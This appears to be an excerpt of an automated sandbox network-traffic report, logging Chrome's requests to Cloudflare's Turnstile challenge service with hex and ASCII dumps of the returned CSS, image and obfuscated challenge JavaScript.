                                      2024-09-13 13:15:55 UTC1369INData Raw: 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69
                                      Data Ascii: or-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .ci


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449751104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:56 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=auto HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:56 UTC331INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:56 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Content-Length: 116451
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Server: cloudflare
                                      CF-RAY: 8c2868ad19a60c86-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 66 59 41 62 70 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.fYAbp5={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                      2024-09-13 13:15:56 UTC1369INData Raw: 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6c 6f 6e 67 65 72 5f 74 68 61 6e 5f 65 78 70 65 63 74 65 64 22 3a 22 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 25 32 33 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 52 65 66 72 65 73 68 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 65 73 74 69 6e 67
                                      Data Ascii: n%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_longer_than_expected":"%3Ca%20href%3D%22%23%22%20class%3D%22refresh_link%22%3ERefresh%3C%2Fa%3E","turnstile_expired":"Expired","testing
                                      2024-09-13 13:15:56 UTC1369INData Raw: 70 61 72 73 65 49 6e 74 28 67 48 28 31 30 36 31 29 29 2f 31 30 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 36 33 38 30 30 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 36 33 30 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 49 28 37 35 32 29 5d 28 65 50 29 2c 65 50 2b 2b 29 3b 67 47 3d 28 65 51 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 31 31 30 37 29 29 2c 65 52 3d 61 74 6f 62 28 67 49 28 35 37 35 29 29 2c 66 68 3d 66 75 6e 63 74 69 6f 6e 28 68 62 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 68 62 3d 67
                                      Data Ascii: parseInt(gH(1061))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,663800),eM=this||self,eN=eM[gI(1630)],eO=[],eP=0;256>eP;eO[eP]=String[gI(752)](eP),eP++);gG=(eQ=(0,eval)(gI(1107)),eR=atob(gI(575)),fh=function(hb,d,e,f,g){return hb=g
                                      2024-09-13 13:15:56 UTC1369INData Raw: 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 64 76 43 57 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 63 41 75 4d 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 72 6e 41 6f 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 68 46 78 47 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 49 75 79 42 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 74 79 41 43 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 68 62 28 37 35 32 29 5d 2c 66
                                      Data Ascii: r':function(h,i){return h&i},'dvCWy':function(h,i){return h*i},'cAuMN':function(h,i){return h==i},'rnAoJ':function(h,i){return i!=h},'hFxGE':function(h,i){return h-i},'IuyBn':function(h,i){return h-i},'tyACh':function(h,i){return h+i}},e=String[hb(752)],f
                                      2024-09-13 13:15:56 UTC1369INData Raw: 64 5b 68 65 28 31 37 33 32 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 31 33 37 36 29 5d 28 64 5b 68 65 28 31 34 39 32 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 65 28 37 33 39 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 68 65 28 31 38 33 34 29 5d 28 4b 3c 3c 31 2e 35 32 2c 64 5b 68 65 28 31 30 36 37 29 5d 28 50 2c 31 29 29 2c 4c 3d 3d 64 5b 68 65 28 38 33 31 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 31 33 37 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 68 65 28 31 37 34 35 29 5d 3d 3d 3d 68 65 28 31 37 33 37 29 29 72 65 74 75 72 6e 20 53 3d 42 5b 68 65 28 31 33 39 37 29 5d 28 78 2c 6a 29
                                      Data Ascii: d[he(1732)](L,o-1)?(L=0,J[he(1376)](d[he(1492)](s,K)),K=0):L++,C++);for(P=F[he(739)](0),C=0;8>C;K=d[he(1834)](K<<1.52,d[he(1067)](P,1)),L==d[he(831)](o,1)?(L=0,J[he(1376)](s(K)),K=0):L++,P>>=1,C++);}else if(d[he(1745)]===he(1737))return S=B[he(1397)](x,j)
                                      2024-09-13 13:15:56 UTC1369INData Raw: 31 38 30 29 5d 28 4b 3c 3c 31 2e 30 39 2c 64 5b 68 65 28 31 35 38 30 29 5d 28 50 2c 31 29 29 2c 64 5b 68 65 28 39 34 36 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 31 33 37 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 47 2d 2d 2c 30 3d 3d 47 26 26 49 2b 2b 7d 66 6f 72 28 50 3d 32 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 68 65 28 31 37 35 37 29 5d 28 4b 2c 31 29 7c 50 26 31 2e 35 38 2c 64 5b 68 65 28 36 32 34 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 68 65 28 31 33 37 36 29 5d 28 64 5b 68 65 28 35 36 31 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 4b 3c 3c 3d 31 2c 4c 3d 3d 6f 2d 31 29 7b 4a 5b 68 65 28 31 33 37 36 29
                                      Data Ascii: 180)](K<<1.09,d[he(1580)](P,1)),d[he(946)](L,o-1)?(L=0,J[he(1376)](s(K)),K=0):L++,P>>=1,C++);G--,0==G&&I++}for(P=2,C=0;C<I;K=d[he(1757)](K,1)|P&1.58,d[he(624)](L,o-1)?(L=0,J[he(1376)](d[he(561)](s,K)),K=0):L++,P>>=1,C++);for(;;)if(K<<=1,L==o-1){J[he(1376)
                                      2024-09-13 13:15:56 UTC1369INData Raw: 68 68 28 31 37 38 30 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 68 28 31 33 34 39 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 68 28 31 35 38 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 68 68 28 36 38 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 68 28 36 31 30 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 68 68 28 31 32 30 33 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 68 68 28 31 37 38 30 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4d 29 4d 3d 45 2b 45 5b
                                      Data Ascii: hh(1780)](2,16),F=1;d[hh(1349)](F,K);L=d[hh(1580)](G,H),H>>=1,d[hh(681)](0,H)&&(H=j,G=o(I++)),J|=F*(0<L?1:0),F<<=1);s[B++]=e(J),M=d[hh(610)](B,1),x--;break;case 2:return D[hh(1203)]('')}if(0==x&&(x=Math[hh(1780)](2,C),C++),s[M])M=s[M];else if(B===M)M=E+E[
                                      2024-09-13 13:15:56 UTC1369INData Raw: 76 28 31 37 34 34 29 5d 3d 68 76 28 31 36 32 31 29 2c 6a 5b 68 76 28 31 37 31 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 76 28 31 33 39 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 76 28 31 32 31 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 69 7c 7c 6b 5b 68 76 28 31 32 38 36 29 5d 2c 6d 3d 65 4d 5b 68 76 28 31 36 36 38 29 5d 5b 68 76 28 31 37 30 39 29 5d 3f 6b 5b 68 76 28 31 31 38 35 29 5d 28 27 68 2f 27 2b 65 4d 5b 68 76 28 31 36 36 38 29 5d 5b 68 76 28 31 37 30 39 29 5d 2c 27 2f 27 29 3a 27 27 2c 6e 3d 6b 5b 68 76 28 31 35 39 34 29 5d 28 6b 5b 68 76 28 31 35 39 34
                                      Data Ascii: v(1744)]=hv(1621),j[hv(1718)]=function(F,G){return F+G},j[hv(1399)]=function(F,G){return F+G},j[hv(1215)]=function(F,G){return F+G},j);try{if(l=i||k[hv(1286)],m=eM[hv(1668)][hv(1709)]?k[hv(1185)]('h/'+eM[hv(1668)][hv(1709)],'/'):'',n=k[hv(1594)](k[hv(1594
                                      2024-09-13 13:15:56 UTC1369INData Raw: 31 36 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 41 2c 6e 29 7b 69 66 28 68 41 3d 68 77 2c 6e 3d 7b 27 57 4a 62 58 45 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 72 65 74 75 72 6e 20 73 5e 6f 7d 2c 27 6e 55 4e 64 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 79 29 7b 72 65 74 75 72 6e 20 68 79 3d 62 2c 6a 5b 68 79 28 34 33 37 29 5d 28 6f 2c 73 29 7d 2c 27 6a 52 62 53 49 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 68 7a 29 7b 72 65 74 75 72 6e 20 68 7a 3d 62 2c 6a 5b 68 7a 28 34 33 37 29 5d 28 6f 2c 73 29 7d 7d 2c 6a 5b 68 41 28 31 31 30 39 29 5d 28 68 41 28 34 35 35 29 2c 6a 5b 68 41 28 35 37 32 29 5d 29 29 7b 69 66 28 44 3d 45 2e 68 5b 46 2e 67 5e 31 37 32 2e 33 36 5d 2c 30 3c 47 5b 68 41 28 31 36 36 32 29 5d 29 7b 69 66 28 56 2e 68 5b 6e 5b
                                      Data Ascii: 1677)](function(hA,n){if(hA=hw,n={'WJbXE':function(o,s){return s^o},'nUNdg':function(o,s,hy){return hy=b,j[hy(437)](o,s)},'jRbSI':function(o,s,hz){return hz=b,j[hz(437)](o,s)}},j[hA(1109)](hA(455),j[hA(572)])){if(D=E.h[F.g^172.36],0<G[hA(1662)]){if(V.h[n[
                                      2024-09-13 13:15:56 UTC1369INData Raw: 39 29 5d 3d 67 68 2c 67 6f 5b 67 49 28 31 38 33 36 29 5d 3d 67 69 2c 67 6f 5b 67 49 28 31 30 34 36 29 5d 3d 67 64 2c 67 6f 5b 67 49 28 38 35 39 29 5d 3d 67 6a 2c 67 6f 5b 67 49 28 35 38 36 29 5d 3d 67 67 2c 67 6f 5b 67 49 28 34 38 30 29 5d 3d 67 66 2c 67 6f 5b 67 49 28 39 37 30 29 5d 3d 66 42 2c 67 6f 5b 67 49 28 31 35 32 35 29 5d 3d 67 62 2c 67 6f 5b 67 49 28 31 38 33 31 29 5d 3d 67 61 2c 67 6f 5b 67 49 28 37 30 34 29 5d 3d 66 74 2c 67 6f 5b 67 49 28 31 30 33 37 29 5d 3d 66 51 2c 67 6f 5b 67 49 28 31 32 37 33 29 5d 3d 66 52 2c 67 6f 5b 67 49 28 35 31 36 29 5d 3d 67 31 2c 67 6f 5b 67 49 28 31 34 35 35 29 5d 3d 67 30 2c 67 6f 5b 67 49 28 31 33 33 39 29 5d 3d 66 5a 2c 67 6f 5b 67 49 28 37 31 34 29 5d 3d 66 59 2c 67 6f 5b 67 49 28 36 31 34 29 5d 3d 66 4a 2c
                                      Data Ascii: 9)]=gh,go[gI(1836)]=gi,go[gI(1046)]=gd,go[gI(859)]=gj,go[gI(586)]=gg,go[gI(480)]=gf,go[gI(970)]=fB,go[gI(1525)]=gb,go[gI(1831)]=ga,go[gI(704)]=ft,go[gI(1037)]=fQ,go[gI(1273)]=fR,go[gI(516)]=g1,go[gI(1455)]=g0,go[gI(1339)]=fZ,go[gI(714)]=fY,go[gI(614)]=fJ,


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.449752104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:56 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:56 UTC240INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:56 GMT
                                      Content-Type: image/png
                                      Content-Length: 61
                                      Connection: close
                                      cache-control: max-age=2629800, public
                                      Server: cloudflare
                                      CF-RAY: 8c2868af1e658c45-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.449753104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:57 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=auto HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:57 UTC331INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:57 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Content-Length: 125419
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Server: cloudflare
                                      CF-RAY: 8c2868b29afb4262-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 66 59 41 62 70 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.fYAbp5={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                      2024-09-13 13:15:57 UTC1369INData Raw: 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64
                                      Data Ascii: trator%20if%20this%20problem%20persists.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_expired":"Expired","turnstile_feedback_description":"Send
                                      2024-09-13 13:15:57 UTC1369INData Raw: 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 37 35 36 32 30 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 38 33 37 29 5d 2c 65 4f 3d 7b 7d 2c 65 4f 5b 67 49 28 31 35 30 38 29 5d 3d 27 6f 27 2c 65 4f 5b 67 49 28 31 30 37 31 29 5d 3d 27 73 27 2c 65 4f 5b 67 49 28 37 33 30 29 5d 3d 27 75 27 2c 65 4f 5b 67 49 28 31 38 39 30 29 5d 3d 27 7a 27 2c 65 4f 5b 67 49 28 31 36 39 35 29 5d 3d 27 6e 27 2c 65 4f 5b 67 49 28 39 39 30 29 5d 3d 27 49 27 2c 65 50 3d 65 4f 2c 65 4d 5b 67 49 28 37 38 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 67 4d 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45
                                      Data Ascii: d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,475620),eM=this||self,eN=eM[gI(1837)],eO={},eO[gI(1508)]='o',eO[gI(1071)]='s',eO[gI(730)]='u',eO[gI(1890)]='z',eO[gI(1695)]='n',eO[gI(990)]='I',eP=eO,eM[gI(783)]=function(g,h,i,j,gM,o,x,B,C,D,E
                                      2024-09-13 13:15:57 UTC1369INData Raw: 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 61 64 2e 68 5b 48 5b 67 50 28 31 35 32 39 29 5d 28 31 38 30 2c 61 65 2e 67 29 5d 5b 67 50 28 31 31 35 30 29 5d 28 4e 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 69 66 28 2d 31 3d 3d 3d 4e 29 74 68 72 6f 77 20 4f 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 61 39 2e 68 5b 61 61 2e 67 5e 36 35 5d 3d 4f 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 65 6c 73 65 20 74 68 72 6f 77 20 4f 7d 7d 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4d 28 31 36 34 39 29 5d 5b 67 4d 28 31 33 35 30 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 67 4d 28 39 33 34 29 5d 28 43 2c 78 5b 67 4d 28 31 31 33 38 29 5d 29 3b 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29
                                      Data Ascii: inue;case'2':ad.h[H[gP(1529)](180,ae.g)][gP(1150)](N);continue;case'3':if(-1===N)throw O;continue;case'4':a9.h[aa.g^65]=O;continue}break}}else throw O}}}(x),B='nAsAaAb'.split('A'),B=B[gM(1649)][gM(1350)](B),C=0;o[gM(934)](C,x[gM(1138)]);D=x[C],E=eR(g,h,D)
                                      2024-09-13 13:15:57 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 57 76 41 79 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 79 6a 76 59 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 68 77 5a 4b 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 44 65 6f 49 51 27 3a 68 6b 28 31 30 37 36 29 2c 27 61 72 75 65 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 7a 77 52 66 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6e 4c 45 62 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 65 58 43 47
